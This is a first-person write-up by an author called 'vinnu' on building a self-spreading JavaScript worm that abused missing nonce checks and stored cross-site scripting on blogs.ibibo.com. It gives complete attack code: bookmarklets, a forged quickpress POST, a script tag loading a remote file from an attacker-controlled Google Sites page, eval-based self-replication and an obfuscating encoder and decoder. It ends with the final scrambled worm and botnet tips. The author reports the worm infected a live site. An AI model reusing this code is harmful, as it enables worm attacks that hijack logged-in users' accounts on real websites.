Author: "vinnu"
// Bookmarklet: dumps the first <form> on the page as a name=value&name=value
// string, i.e. the field set a POST of that form would carry. The author uses
// it to learn which parameter names the target form submits.
// Note that values are concatenated raw - nothing is URL-encoded here.
javascript:var vin=document.getElementsByTagName("form")[0];
// vin.length / vin.item(i) walk the form's controls; only the first pair
// is written without a leading "&".
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);
The above script retrieves the form elements and their values.
So now I had the script (you have to alter the above script a
little, increasing the form index to a suitable value so that it
reaches the target form), as:
// Same form inspector as above, pointed at the third <form> (index 2);
// the author reports this index reaches the target form on the wp-admin
// page. Output is again an un-encoded name=value&... string shown in an alert.
javascript:var vin=document.getElementsByTagName("form")[2];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);
"http://blogs.ibibo.com/<your-blog>/wp-admin/"
The page will open. I wrote "Namaste" in the title and "Hows the life
there" in the content box. It gave me the following in a dialogue
box:
It worked, and it posted the blog entry even without the nonce and
referer defined in the query string - i.e. the endpoint accepted a
cross-site POST with an empty `_wpnonce` and `_wp_http_referer`, which is
the missing server-side check everything that follows depends on. But
there is a problem. The script is appearing in the heading, and I also
wanted the script to post a different topic every time it gets executed,
so I introduced the well-known following construct for choosing one of
the strings out of a list:
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
javascript:blog();
function blog(){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent(nunnu);
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-
admin/post.php",blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
}alert("done");
javascript:var vin=document.getElementsByTagName("a");var
nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);
But there are also several other items along with blogs.
So my virus must identify the blogs out of other objects.
I checked the pattern.
javascript:test();
function test() {
var list="";
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
var intex=0;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
list += address+"\n";intex++;
}}alert(intex+"\n"+list);}
Now, i have got a way to identify the blogs out of other objects
and post the random topics.
javascript:trigger();
function trigger() {
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
blog(address);
}}}
function blog(addr){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV(addr,blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
};
But i thought the title was not a good place to inject the code
as it will appear in dashboard. So I placed the code in the argument
of post.php named "content" instead of "post_title".
The variable "nunnu" contains the code for a script which retrieves
the remote javascript file at:
http://sites.google.com/site/urcontrolledsite/ibibo.js
Note: The third party free sites are also useful to connect to a botnet if
you do not have any dedicated server. In ur script file at free site like google,
you can place a script that can redirect the requests to ur home computer. This
can
be achieved by using a simplest <script> tag with its "src" attribute defined to
ur
home computer's current IP address. But this makes it necessary to remove such
redirector
scripts or change the IP address everytime you get a new IP address or disconnect.
Otherwise,
the botnet will be orphaned or will end up in chaos.
We need to direct our script to inject itself (whole script) into other
blogs also. This can be achieved by a enclosing whole script into a
string
variable and then using the eval() method.
The eval() method takes a string argument that holds the code to
execute and runs it with the full privileges of the page - here,
whatever ends up in the post's "content" field.
So what we can do now is, we have to equate above all code into a
variable
and then feed this very variable to the "content" variable and eval
the variable as in above script.
eval(vinnu);alert(vinnu);var vinnu="alert(document.cookie)";
This script will fail. It works normally with a function that is defined
later (function declarations are hoisted in full), but not with variables.
The above script will work second time, but will fail for first time, So never use
it:
eval(vinnu);var vinnu="alert(document.cookie)";
This is because when it is executed for the first time, the `var`
declaration is hoisted but its assignment is not, so at the moment
eval() runs the variable is still undefined and nothing is executed;
variables must be assigned first and used later (not the case with
function declarations). On the second attempt, the variable "vinnu"
has already been defined during the first execution, after eval() failed.
Also the alert() method is added just for debugging purpose and it must be removed
in final product.
\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \"
Now I have turned the whole script into a string variable,
and that is why I have to escape all double and single quotation marks
with a prefixed escape character ( \ ).
"</sc"+"rip"+"t>"
The HTML tags which are appearing within the script are for the
alignment of the Injection Vector of the XSS payload.
The virus is ready. And u can trigger it now from your web-browser's
addressbar while you are already logged in into the blogs.ibibo.com.
But this virus is still in clear text, so why not apply some scrambling
to it. There are some easy and fast ways to do it. (There are also
robust encryption schemes like DES and RSA - SHA is a hash and base64 is
only an encoding, neither of which encrypts - but I used the simplest
to save the processing overhead. Note that the scrambling below is
obfuscation, not encryption: the decoder ships with the payload, so it
only defeats naive pattern matching, not an analyst who has the text.)
The first call will escape all the special characters like /\$#@!~
%^&*()_+|"'?><,./;:[]{}~` etc. into their hex equivalents (strictly,
escape() leaves letters, digits and @ * _ + - . / untouched, which is
why those survive unchanged in the scrambled blob below), and the second
call to escape will escape the % signs once again. We can use escape
several times, but remember to unescape the code an equal number of
times, as:
vinnu = escape(escape(vinnu));
vinnu = unescape(unescape(vinnu));
The encoder:
// Obfuscator ("encoder") for the payload described above.
// Step 1: escape() percent-encodes most punctuation (letters, digits and
// @ * _ + - . / pass through, which is why they are readable in the blob below).
// Step 2: a fixed four-character substitution: % -> Q, i -> Z, a -> J, t -> F.
// This is not encryption: the mapping is constant and the inverse y() travels
// with the payload, so an analyst recovers the clear text by applying y() once.
// Known collision: a literal "F" (or Q, Z, J) in the input is passed through
// unchanged here, and y() then maps it to "t" - "Free" decodes as "tree".
function z(x) {
// x: clear-text string to scramble; returns the scrambled string.
x=escape(x);
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="%") {
s="Q";
}else if(s=="i"){s="Z"}else if(s=="a"){s="J";}else if(s=="t")
{s="F";}
else{s=x.charAt(i);} // every other character is copied as-is
r+=s;
}return r; }
The decoder:
// Decoder: inverse of z(). Undoes the substitution (Q -> %, Z -> i, J -> a,
// F -> t) and then unescape()s the result. For analysis, running y() once over
// the scrambled 'ashi' string further down yields the clear-text script.
// The author reports that this version, whose source contains the literal
// letters Q/Z/J/F, did not survive being scrambled itself; the later version
// writes them as \x hex escapes instead.
function y(x) {
// x: scrambled string; returns the decoded clear text.
var s="",r="";
for(var i=0;i<x.length;i++) { s=x.charAt(i);
if(s=="Q"){
s="%";
}else if(s=="Z"){s="i";}else if(s=="J"){s="a";}else
if(s=="F"){s="t";}
else{s=x.charAt(i);} // any other character is copied as-is
r+=s;
}r=unescape(r);return r;
}
I just replaced "%" with "Q", "i" with "Z", "a" with "J", and "t" with
"F".
Note: There was a bug: it turned "Free Tibet" into "tree Tibet", because
the decoder maps every "F" back to "t", including the capital "F" of
"Free" that the encoder had passed through untouched. I noticed it after
the infection started, and in the beginning I couldn't identify the
posts with the "tree tibet" topic.
I've used the encoder only once in this case. And the virus code
contained the
scrambled code and a decoder and and eval().
The decoder code was also inside the scramble and while infecting it
should also
place the unscrambled decoder and eval() function in the body of virus.
Once the code executed it will infect other blogs with decoder and eval
attached
at the end of the scrambled code.
But the decoder has a problem in this case. Once it will go under
scrambling, following
code will be interchanged as shown below:
Similarly for other characters, and the decoder will fail to decode
properly.
So I replaced those characters in the decoder with their hex escapes
(`\x51` for "Q", `\x5A` for "Z", `\x4A` for "J", `\x46` for "F", and
likewise for their replacements), and the decoder code was changed as
shown below:
// Decoder, hex-escaped variant. Behaviour is identical to y() above:
//   \x51 ("Q") -> \x25 ("%"), \x5A ("Z") -> \x69 ("i"),
//   \x4A ("J") -> \x61 ("a"), \x46 ("F") -> \x74 ("t"), then unescape().
// The literals are written as \x escapes so that the decoder's own source text
// contains none of the letters the substitution touches (the author's stated
// reason for the change). Useful as-is for de-obfuscating the blob below.
function y(x) {
// x: scrambled string; returns the decoded clear text.
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="\x51") {
s="\x25";
}else if(s=="\x5A") {
s="\x69";
}else if(s=="\x4A") {
s="\x61";
}else if(s=="\x46") {
s="\x74";
}else {
s=x.charAt(i); // any other character is copied as-is
}r+=s;
}
r=unescape(r);return r;
}
After combining this decoder to the virul code before undergoing the
scrambling,
the beast acquired the following shape:
Remember, try to use variable and function names short to make virul
code compact.
Now I just need to scramble the code. For this purpose I created a HTML
file
containing the code and encoder and decoder. This file will assemble
the virus
and will provide us the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
ashi = z(ashi);
var fuse = ';function y(x){var s=\"\",r=\"\";for(var i=0;i<x.length;i+
+){s=x.charAt(i);if(s==\"Q\"){s=\"%\";}else if(s==\"Z\"){s=\"i\";}else
if(s==\"J\"){s=\"a\";}else if(s==\"F\")
{s=\"t\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert(\"Decoded and executed: \"+y(ashi));';
var assembledAshi = "javascript:var ashi='"+z(ashi)+"'"+fuse;
var vhtml = "<P><PRE>" + assembledAshi+"</PRE></P>";
</script>
</head>
<body>
<H1>The Ashi virus Assembler.</H1>
<HR>
<br>
<div id="viraldiv"><H3> love you nunnu</H3>
The viral Code:<BR><HR>
<script language=javascript>document.write(vhtml);</script>
<HR>
<div>
</body>
</html>
javascript:var
ashi='FrZggerQ28Q29Q3BfuncFZonQ20FrZggerQ28Q29Q7BvJrQ20vZnQ3DdocumenF.geFElemenFsB
yTJgNJmeQ28Q22JQ22Q29Q3BvJrQ20FoFJlQ3D0Q3BvJrQ20ZndexQ3D0Q3BvJrQ20JddressQ3BforQ28
vJrQ20ZFerQ3D0Q3BZFerQ3CvZn.lengFhQ3BZFer+
+Q29Q7BZfQ28Q28ZndexQ3DvZnQ5BZFerQ5D.href.ZndexOfQ28Q22wp-JdmZnQ22Q29Q29Q21Q3D-
1Q29Q7BJddressQ3DvZnQ5BZFerQ5D.href.subsFrZngQ280Q2CZndex+8Q29+Q22/posF.phpQ22Q3Bb
logQ28JddressQ29Q3BQ7DQ7DQ7DfuncFZonQ20blogQ28JddrQ29Q7BvJrQ20encodrQ3DQ22funcFZon
Q20yQ28xQ29Q7BvJrQ20sQ3DQ5CQ22Q5CQ22Q2CrQ3DQ5CQ22Q5CQ22Q3BforQ28vJrQ20ZQ3D0Q3BZQ3C
x.lengFhQ3BZ+
+Q29Q7BsQ3Dx.chJrAFQ28ZQ29Q3BZfQ28sQ3DQ3DQ5CQ22Q5Cx51Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx25Q
5CQ22Q3BQ7DelseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx5AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx69Q5CQ22Q3BQ7D
elseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx4AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx61Q5CQ22Q3BQ7DelseQ20ZfQ2
8sQ3DQ3DQ5CQ22Q5Cx46Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx74Q5CQ22Q3BQ7DelseQ7BsQ3Dx.chJrAFQ28
ZQ29Q3BQ7Dr+Q3DsQ3BQ7DrQ3DunescJpeQ28rQ29Q3BreFurnQ20rQ3BQ7DQ22Q3BvJrQ20nunnuQ3DQ2
2Q3EQ3CscrQ22+Q22ZpFQ20lJnguJgeQ3DjJvJscrZpFQ22+Q22Q20srcQ3DQ5CQ22hFFpQ3A//sZFes.g
oogle.com/sZFe/cyberspecZes/n/ZbZbo.jsQ5CQ22Q3EQ3C/scrQ22+Q22ZpFQ3EQ3CJQ20hrefQ3DQ
5CQ22Q5CQ22Q20onmouseoverQ3DjJvJscrZpFQ3AevJlQ28yQ28JshZQ29Q29Q3BQ3EjJZjeyJQ3C/JQ3
EQ3CJQ20Q22Q3BvJrQ20noQ3DMJFh.floorQ28MJFh.rJndomQ28Q29*10Q29Q3BvJrQ20quoFeQ3DnewQ
20ArrJyQ2810Q29Q3BquoFeQ5B0Q5DQ3DQ22SJhdZQ20bhJsJQ20sJhdZQ20jJJn...Q22Q3BquoFeQ5B1
Q5DQ3DQ22DonFQ20youQ20FhZnkQ20weQ20cJn...Q22Q3BquoFeQ5B2Q5DQ3DQ22ThJFsQ20FheQ20JFF
ZFude...KeepQ20ZFQ20up.Q22Q3BquoFeQ5B3Q5DQ3DQ22InFellZgenFQ3F..Q22Q3BquoFeQ5B4Q5DQ
3DQ22MJZnQ20koZQ20mJchZneQ20FhodZQ20hJZ...Q22Q3BquoFeQ5B5Q5DQ3DQ22jJZjeyJQ20jZQ21Q
20TheekQ20hJZnnQ20nJQ3F...Q22Q3BquoFeQ5B6Q5DQ3DQ22VeeroQ21Q20TusJJnQ20EhQ20bhZQ20p
JrhZQ20leyJQ22Q3BquoFeQ5B7Q5DQ3DQ22HZmJchJlQ20JQ20heJven...Q22Q3BquoFeQ5B8Q5DQ3DQ2
2FreeQ20TZbeF...Q22Q3BquoFeQ5B9Q5DQ3DQ22PJhJrhZQ21lovelyQ20lJnguJge...Q22Q3BvJrQ20
blpJyloJdQ3DQ22posF_FZFleQ3DQ22+quoFeQ5BnoQ5DQ3BblpJyloJd+Q3DQ22Q26conFenFQ3DjJZje
yJQ3EQ3C/pQ3EQ3C/dZvQ22Q3BblpJyloJd+Q3DencodeURIComponenFQ28Q22Q3EQ3CQ22+Q22scQ22+
Q22rZpFQ20lJnguJgeQ3DjJvJscrZpFQ3EvJrQ20JshZQ3DQ27Q22+JshZ+Q22Q27Q3BevJlQ28yQ28Jsh
ZQ29Q29Q3BQ22+encodr+Q22Q3CQ22+Q22/scQ22+Q22rZpFQ3EQ3CJQ20Q22Q29Q3BblpJyloJd+Q3Den
codeURIComponenFQ28nunnuQ29Q3BblpJyloJd+Q3DQ22horQ26FJgs_ZnpuFQ3DQ26JcFZonQ3DposF-
quZckpress-
sJveQ26quZckpress_posF_IDQ3D0Q26_wpnonceQ3DQ26_wp_hFFp_refererQ3DQ26sJveQ3DSJveQ25
20DrJfFQ26Q3DCJncelQ26publZshQ3DPublZshQ22Q3BJjJxPSLVQ28JddrQ2CblpJyloJdQ29Q3BQ7Df
uncFZonQ20JjJxPSLVQ28urlQ2CpJyloJdQ29Q7BvJrQ20xmlhFFpQ3BZfQ28wZndow.XMLHFFpRequesF
Q29Q7BxmlhFFpQ3DnewQ20XMLHFFpRequesFQ28Q29Q3BQ7DelseQ20ZfQ28wZndow.AcFZveXObjecFQ2
9Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22MZcrosofF.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22Msxml2.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BreFurnQ3BQ7DQ7DQ7DxmlhFFp.openQ28Q22POSTQ22Q2CQ20urlQ2CQ20FrueQ29Q3BxmlhFFp
.seFRequesFHeJderQ28Q22ConFenF-TypeQ22Q2CQ22JpplZcJFZon/x-www-form-
urlencodedQ22Q29Q3BxmlhFFp.seFRequesFHeJderQ28Q22ConFenF-
lengFhQ22Q2CpJyloJd.lengFhQ29Q3BxmlhFFp.sendQ28pJyloJdQ29Q3BQ7D';function y(x){var
s="",r="";for(var i=0;i<x.length;i++){s=x.charAt(i);if(s=="Q"){s="%";}else
if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F")
{s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert("Decoded and executed: "+y(ashi));
The last alert has been added to the above viral code to make sure
that the virus is properly triggered. It is not a part of the virus and
will not be replicated.
This virus is a very good example of artificial living organisms helping
each other for their living.
For example, they have now stopped new blog posts from being submitted,
but they haven't yet removed the infection and the virus is still on the
blogs. (Blocking the submission path alone does not remediate a stored
XSS: the already-persisted post content has to be removed or sanitized,
and the nonce/referer validation the payload relied on being absent has
to be enforced.)
And this virus also has a stage two available for retrieval of the code.
Thanx a lot..."vinnu"